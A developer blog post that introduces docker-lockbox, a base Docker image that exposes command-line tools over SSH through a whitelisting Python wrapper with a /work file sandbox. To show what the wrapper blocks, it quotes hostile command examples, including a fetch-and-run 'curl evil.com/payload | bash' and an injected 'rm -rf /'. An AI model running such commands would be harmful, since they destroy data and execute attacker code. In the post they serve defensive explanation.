docker-lockbox: SSH Into a Container, Get Shit Done, Touch Nothing Else

Every time I build a tool that runs inside a Docker container, I hit the same problem: how do I let people interact with it remotely? The obvious answer is an HTTP API. Spin up Flask or Express, write route handlers, parse request bodies, serialize responses, handle errors, add authentication. For every single tool. Every fucking time.

Then it hit me — SSH already does all of this. Authentication? Public key crypto, battle-tested for decades. Transport? Encrypted by default. Remote command execution? That’s literally what SSH was built for. File transfer? Built in. The only problem is that a normal SSH session gives you a shell, and a shell gives you everything. One rm -rf / and your container is gone. One ; curl evil.com/payload | bash and you’re compromised.

So I built docker-lockbox. A locked-down SSH container where there is no shell. Every command goes through a Python wrapper that validates it against a whitelist before executing. Shell metacharacters like &&, ;, |, $() are just literal strings — they don’t mean anything because no shell ever interprets them. You define exactly which commands are allowed, and everything else gets rejected.

It’s a base image. You FROM psyb0t/lockbox, install your binaries, drop in a JSON file listing which commands are allowed, and you’ve got a secure, remotely accessible tool container. No HTTP framework, no REST endpoints, no request parsing. Just ssh myapp@host "tool --flag arg".

The Problem With HTTP APIs For Everything

I’ve been wrapping CLI tools in HTTP APIs for years. It’s always the same pattern:

  • Write a web server that accepts POST requests
  • Parse the JSON body into command arguments
  • Spawn a subprocess, capture stdout/stderr
  • Serialize the output back to JSON
  • Handle file uploads via multipart forms
  • Handle file downloads via streaming responses
  • Add authentication because the endpoint is exposed
  • Add rate limiting because the internet is hostile
  • Add CORS headers because browsers exist

That’s like 200 lines of boilerplate before you’ve done anything useful. And then you do it again for the next tool. And the next one. The actual business logic is one line — ffmpeg -i input.mp4 output.wav — but the wrapper around it is a whole project.

SSH gives you all of this for free. Key-based auth that’s stronger than any API token. Encrypted transport without thinking about TLS certificates. File transfer with scp or pipe redirection. Command execution that’s just… command execution. The only thing missing is the lockdown — making sure the person on the other end can only run what you want them to run.

How The Lockdown Works

When someone SSHs into a lockbox container, they don’t get a shell. The SSH server’s ForceCommand directive routes every connection through a Python wrapper called lockbox-wrapper. This wrapper:

  1. Reads the command from SSH_ORIGINAL_COMMAND
  2. Parses it with shlex.split() — Python’s shell-style tokenizer, which splits like a shell without ever invoking one
  3. Checks the command name against the allowed list
  4. If it’s a built-in file operation, handles it directly in Python
  5. If it’s an allowed external command, calls os.execv() with the binary path and arguments
  6. If it’s anything else, rejects it

The critical detail: os.execv(), not subprocess.Popen(shell=True). The binary is executed directly with its arguments as a list. No shell is involved at any point in the chain — not in SSH, not in the wrapper, not in execution. When someone sends ssh myapp@host "ffmpeg -i input.mp4; rm -rf /", the wrapper sees one command named ffmpeg with arguments ["-i", "input.mp4;", "rm", "-rf", "/"]. The semicolon is just a character in an argument string. ffmpeg will complain about a weird filename and that’s it.
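
To make that concrete, here’s a stripped-down sketch of the idea. It is not the actual lockbox-wrapper source (built-in file operations and most error handling are skipped), but the shape is the same: tokenize without a shell, check the whitelist, exec the binary directly.

#!/usr/bin/env python3
# Rough sketch of the ForceCommand wrapper idea, not the shipped lockbox-wrapper
import json
import os
import shlex
import sys

# same location the Dockerfile example later in this post copies allowed.json to
ALLOWED = json.load(open("/etc/lockbox/allowed.json"))

raw = os.environ.get("SSH_ORIGINAL_COMMAND", "")
if not raw:
    sys.exit("no command given; there is no interactive shell here")

argv = shlex.split(raw)        # tokenized like a shell would, but never run by one
name, args = argv[0], argv[1:]

if name not in ALLOWED:
    sys.exit(f"command not allowed: {name}")

# execv replaces this process with the binary; arguments stay a list,
# so ';', '&&', '|' and '$()' are just bytes inside ordinary strings
os.execv(ALLOWED[name], [name, *args])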

Built-in File Operations

Every lockbox container ships with a full set of file operations that work inside the /work directory. You don’t configure these — they’re always available:

# Upload a file
ssh lockbox@host "put input.txt" < input.txt # Download a file ssh lockbox@host "get output.txt" > output.txt
# List files (plain or JSON)
ssh lockbox@host "list-files"
ssh lockbox@host "list-files --json"
# File metadata
ssh lockbox@host "file-info output.txt"
ssh lockbox@host "file-hash output.txt"
ssh lockbox@host "file-exists output.txt"
# Move, copy, delete
ssh lockbox@host "move-file old.txt new.txt"
ssh lockbox@host "copy-file original.txt backup.txt"
ssh lockbox@host "remove-file input.txt"
# Directory operations
ssh lockbox@host "create-dir project1"
ssh lockbox@host "remove-dir project1"
ssh lockbox@host "remove-dir-recursive project1"
# Search and disk usage
ssh lockbox@host "search-files **/*.txt"
ssh lockbox@host "disk-usage"
# Append to existing file
echo "more data" | ssh lockbox@host "append-file output.txt"

All paths are sandboxed to /work. The wrapper resolves every path through os.path.realpath() and checks that the result starts with /work/. Absolute paths get remapped under /work. Traversal attempts with ../../ get resolved and blocked. You physically cannot touch anything outside that directory.
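
The check itself fits in a few lines. Again, a sketch of the approach rather than the shipped code, assuming the rules described above: drop the leading slash from absolute paths, resolve everything with realpath, and refuse anything that lands outside /work.

import os

WORK_DIR = "/work"

def sandbox_path(user_path: str) -> str:
    # absolute paths lose their leading '/' so they land under /work
    rel = user_path.lstrip("/")
    # realpath collapses '..' and follows symlinks before the check
    resolved = os.path.realpath(os.path.join(WORK_DIR, rel))
    if resolved != WORK_DIR and not resolved.startswith(WORK_DIR + os.sep):
        raise PermissionError(f"path escapes {WORK_DIR}: {user_path}")
    return resolved

sandbox_path("output.txt")        # /work/output.txt
sandbox_path("/etc/passwd")       # /work/etc/passwd, remapped under the sandbox
sandbox_path("../../etc/passwd")  # raises: resolves to /etc/passwd, outside /work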

Building Your Own Tool Container

The whole point of lockbox is to be a base image. You install your tools, tell lockbox which commands to allow, and you’re done. Here’s a complete example — an ffmpeg processing container:

# allowed.json
{
  "ffmpeg": "/usr/bin/ffmpeg",
  "ffprobe": "/usr/bin/ffprobe"
}
# Dockerfile
FROM psyb0t/lockbox
ENV LOCKBOX_USER=mediaproc
RUN apt-get update && \
    apt-get install -y --no-install-recommends ffmpeg && \
    apt-get clean && rm -rf /var/lib/apt/lists/*
COPY allowed.json /etc/lockbox/allowed.json

That’s the entire Dockerfile. Build it, run it with your SSH key mounted, and now you can remotely process media:

# Upload a video
ssh -p 2222 mediaproc@host "put input.mp4" < video.mp4 # Convert to audio ssh -p 2222 mediaproc@host "ffmpeg -i /work/input.mp4 -vn -acodec pcm_s16le /work/output.wav" # Download the result ssh -p 2222 mediaproc@host "get output.wav" > output.wav

The user can run ffmpeg and ffprobe with any arguments they want. They can upload and download files. They cannot do anything else. No shell, no package installation, no network probing, no container escape. The attack surface is exactly two binaries plus the file operations.
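
And since the interface is plain SSH, driving a container like this from code needs no client library at all. The helper below is hypothetical, not something lockbox ships; it just shells out to ssh with the same put/get/run commands shown above (adjust the user, host, and port to your setup).

import subprocess

SSH = ["ssh", "-p", "2222", "mediaproc@host"]  # assumption: swap in your own user/host/port

def run(command: str) -> str:
    # one remote command per call; the wrapper validates it on the far end
    result = subprocess.run([*SSH, command], capture_output=True, text=True, check=True)
    return result.stdout

def put(local: str, remote: str) -> None:
    # stream the local file into the built-in 'put' command
    with open(local, "rb") as f:
        subprocess.run([*SSH, f"put {remote}"], stdin=f, check=True)

def get(remote: str, local: str) -> None:
    # stream the built-in 'get' command's output into a local file
    with open(local, "wb") as f:
        subprocess.run([*SSH, f"get {remote}"], stdout=f, check=True)

put("video.mp4", "input.mp4")
run("ffmpeg -i /work/input.mp4 -vn -acodec pcm_s16le /work/output.wav")
get("output.wav", "output.wav")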

The Entrypoint

The entrypoint handles all the shit that makes containers annoying to run as non-root:

UID/GID matching. Pass LOCKBOX_UID and LOCKBOX_GID to match the host user. Files created in /work have correct ownership on the host. No permission fuckery.

Custom SSH username. Set LOCKBOX_USER=myapp in your Dockerfile and users connect with ssh myapp@host instead of ssh lockbox@host. The entrypoint renames the system user and updates sshd config at startup.

Persistent host keys. Mount a volume to /etc/lockbox/host_keys and SSH host keys survive container recreates. No more “REMOTE HOST IDENTIFICATION HAS CHANGED” warnings every time you rebuild.

Entrypoint extensions. Drop executable .sh scripts in /etc/lockbox/entrypoint.d/ and they run before sshd starts. Need to rebuild a font cache? Warm up a model? Initialize a database? Just add a script.

Tailscale and The Zero-Config Dream

Here’s where lockbox really shines. Put your lockbox container on a machine running Tailscale and you’ve got secure remote access to any CLI tool without exposing a single port to the internet. No VPN setup, no firewall rules, no reverse proxy, no TLS certificates, no dynamic DNS bullshit.

Your home server running ffmpeg via lockbox? ssh -p 2222 mediaproc@my-server "ffmpeg -i /work/input.mp4 /work/output.wav" from anywhere in the world. Your GPU rig doing ML inference? Same thing. Your Raspberry Pi running some weird sensor processing? Same fucking thing. Tailscale handles the networking, SSH handles the authentication and encryption, lockbox handles the sandboxing. Three layers of security with zero configuration beyond what you’ve already done.

The same applies to Cloudflare Tunnel if that’s your thing. Route SSH through the tunnel, lockbox validates commands on the other end. No ports exposed, no attack surface beyond what you explicitly allow.

This is the real power move — any CLI tool on any machine becomes a secure, remotely accessible service. No API server, no port forwarding, no nginx, no certbot. Just SSH through your mesh network and run commands.

The Installer Generator

This is where lockbox gets seriously useful for distributing tools. The repo includes create_installer.sh — a script that takes a YAML config and generates a complete install.sh for your downstream project. Users run curl | sudo bash and get a fully configured setup with docker-compose, SSH keys, a CLI wrapper, and lifecycle management.

Example config:

name: myapp
image: psyb0t/myapp
repo: psyb0t/docker-myapp
volumes:
  - flag: -d
    env: DATA_DIR
    mount: /data:ro
    default: ./data
    description: Data directory
environment:
  - flag: -w
    env: WORKERS
    container_env: APP_WORKERS
    default: 4
    description: Number of workers

Run it through the generator and you get an install.sh that creates ~/.myapp/ with docker-compose files, authorized_keys, host_keys, work dir, a .env with all configurable values, and a CLI wrapper at /usr/local/bin/myapp with commands for the full lifecycle:

myapp start -d                                   # start detached
myapp start -d --processing-unit cuda --gpus 0   # NVIDIA GPU 0
myapp start -d --processing-unit rocm --gpus all  # all AMD GPUs
myapp start -d -w 8 --cpus 4 --memory 8g         # resource limits
myapp stop                                        # stop
myapp status                                      # container status
myapp logs -f                                     # follow logs
myapp upgrade                                     # pull latest and reinstall
myapp uninstall                                   # nuke everything

Every generated installer includes GPU support out of the box. Three compose files get generated — base, CUDA overlay, and ROCm overlay. The CLI wrapper merges the right one based on --processing-unit. NVIDIA and AMD GPUs just work with the right flag. CPU mode is the default — no overlays, no GPU passthrough, just run the tool.

Already Built on Lockbox

I’m already using lockbox as the base for other projects:

  • docker-mediaproc — FFmpeg, Sox, ImageMagick, and 2200+ fonts for media processing over SSH
  • docker-qwenspeak — Qwen3-TTS text-to-speech over SSH with preset voices, voice cloning, and voice design

Same pattern each time: install the tool, write the allowed.json, build, ship. No HTTP server, no API framework, no serialization bullshit. The tool’s CLI is the API.

The Bottom Line

Stop wrapping every CLI tool in an HTTP API. SSH already handles authentication, encryption, file transfer, and remote execution. All that’s missing is the lockdown, and that’s what lockbox does — a Python wrapper that validates every command against a whitelist, sandboxes file operations to /work, and never touches a shell.

One base image. One JSON config. Any CLI tool becomes a secure remote service.

Go grab it: github.com/psyb0t/docker-lockbox

Licensed under WTFPL — because locking down SSH access shouldn’t require a locked-down license.